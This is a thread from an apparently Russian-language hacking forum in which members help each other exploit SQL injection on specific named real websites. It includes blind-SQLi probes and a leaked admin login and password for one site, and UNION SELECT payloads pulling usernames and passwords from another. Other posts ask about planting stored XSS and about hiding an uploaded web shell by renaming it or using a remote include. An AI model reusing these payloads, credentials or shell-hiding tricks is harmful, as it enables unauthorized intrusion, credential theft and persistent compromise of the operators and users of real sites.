Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    нет этого тоже пробовал ответ один и тоже ((
     
  2. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    http://www.sysadmin.mail.ru/rekords_detail.php?id=2' выплюнуло ошибку, но раскрутить не выходит:)
     
    #14222 Bramin, 20 Jul 2010
    Last edited: 20 Jul 2010
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.sysadmin.mail.ru/rekords_detail.php?id=2 та же самая ошибка и без ковычки,говорит о чем нить?
     
  4. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    там сначало было так id=27 потом кавычку я подставил сюда id=2'7 -ошибка, если кавычку поставить после 7 ошибки нет
     
  5. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    http://www.tarpanmoscow.ru/index.php?id=36742 - помогите скулю раскрутить, вроде 9 полей нашел но не выводится ни фига..
     
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Там интвал, скорей всего, скули нет.

    Когда кавычку добавляешь к 27, то интвалится до 27, а когда подставляешь ее между 2 и 7, то интвалится до 2, а в базе записи с id 2, видимо, нет, поэтому и ошибка.
     
    1 person likes this.
  7. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    blind

    http://www.tarpanmoscow.ru/index.php?id=36742 AND Length((version()))=6
    http://www.tarpanmoscow.ru/index.php?id=36742 AND ascii(substring((version()),6,1))=53
    ver. 5.1.45
    ---------------------
    http://www.tarpanmoscow.ru/admin/
    admin : admin1tar
     
    #14227 Дирижабль, 21 Jul 2010
    Last edited: 22 Jul 2010
    1 person likes this.
  8. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    ZARO
    Ну тут именно блайнд
    database:db7364a
     
  9. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    о спасиба, ты крут, а я не знал что там блайнд -.- :mad:
     
  10. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    разговор о другой скули друг... посмотри вышe, Попугай имел в виду ошибку на мейл.рy
     
  11. Iggy

    Iggy New Member

    Joined:
    24 Jun 2010
    Messages:
    104
    Likes Received:
    4
    Reputations:
    1
    Добрый день.

    Вопрос по актывным XSS.
    Нашел простую, пассивную:
    Так же на этом перловском полуфоруме можно добавлять темы/сообщения от гостя;
    Вот мои попытки расставить акт.xss:
    Наверняка, я делаю что-то не правильно... Не подскажете, что именно?!
     
  12. Keltos

    Keltos Banned

    Joined:
    8 Jul 2009
    Messages:
    1,558
    Likes Received:
    920
    Reputations:
    520
    Как можно спрятать шелл
    он висит на видном месте site.com/shell.php
     
    1 person likes this.
  13. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Помогите раскрутить или советом =)

    Для НЕэкстрасенсов

    http://macklaw.com/in_the_news/press_detail.asp?id=-94'

    Не получается даже вывести версию.
    В MsAccess, MsSQL не силен.
    Если не получится то хоть обьясните почему =)

    Расчитываю на вашу помощь...
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    auth_root

    http://macklaw.com/in_the_news/press_detail.asp?id=-94+union+select+1,2,3,4,5,6+from+msysaccessobjects

    http://macklaw.com/in_the_news/press_detail.asp?id=-94+union+select+1,2,3,password,5,6+from+users

    http://macklaw.com/in_the_news/press_detail.asp?id=-94+union+select+1,2,3,username,5,6+from+users
     
    _________________________
    #14234 Konqi, 22 Jul 2010
    Last edited: 22 Jul 2010
  15. Yetisports

    Yetisports Banned

    Joined:
    11 Jul 2010
    Messages:
    147
    Likes Received:
    12
    Reputations:
    17
    Помогите раскрутить скулю.
    http://banken.ruilen.nl/random.php?catid=473+union+select+version()--+
    а вот database() уже не показывает почему то.Пишет Unknown column 'admin_ruilen' in 'where clause' Вывод обрезанный, вроде четвертая версия.
    Буду рад любым примерам, т.к. опыта маловато...
    Вывод в ошибке.
     
  16. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    спрячь поглубже и переименуй во что-нибудь типа config.php, если всё равно боишься, что удалят сделай удалённый инклуд в странице сайта.
     
  17. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Там двойной запрос.
    Обьяснять как работает - не буду, кто понял, тот понял :)
     
  18. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Konqi
    Огромное спасибо!
    Вопрос, перебирать поля необходимо только с реально существующей в базе таблицой?
    Если да, то для удобства просто, таблица
    msysaccessobjects
    встречается во всех бд данного типа? Или прийдется наугад подбирать? Если можно, если существуют такие, подкиньте плз. таких таблиц, как в MySQL например information_schema в пятой ветке есть везде.
     
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    auth_root

    https://forum.antichat.ru/thread210003.html
     
    _________________________
  20. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Konqi
    огромное тебе спасибо! =) Плюс.
    Только вопрос, админку не нашел? =) Если нашел или шелл залил, не мог бы скинуть в пм? Хотелось бы конечно увидеть пошагово, какие ты проводишь манипуляции с запросами при взломе. Но это будет наглеж с моей стороны отбирать твое время. Поэтому я изучаю статейку, хотелось бы все повторить на практике, вплоть до заливки шелла.
    Не тупо скопировать всё за кем то, а разобраться и понять каждый передаваемый параметр...
     
Thread Status:
Not open for further replies.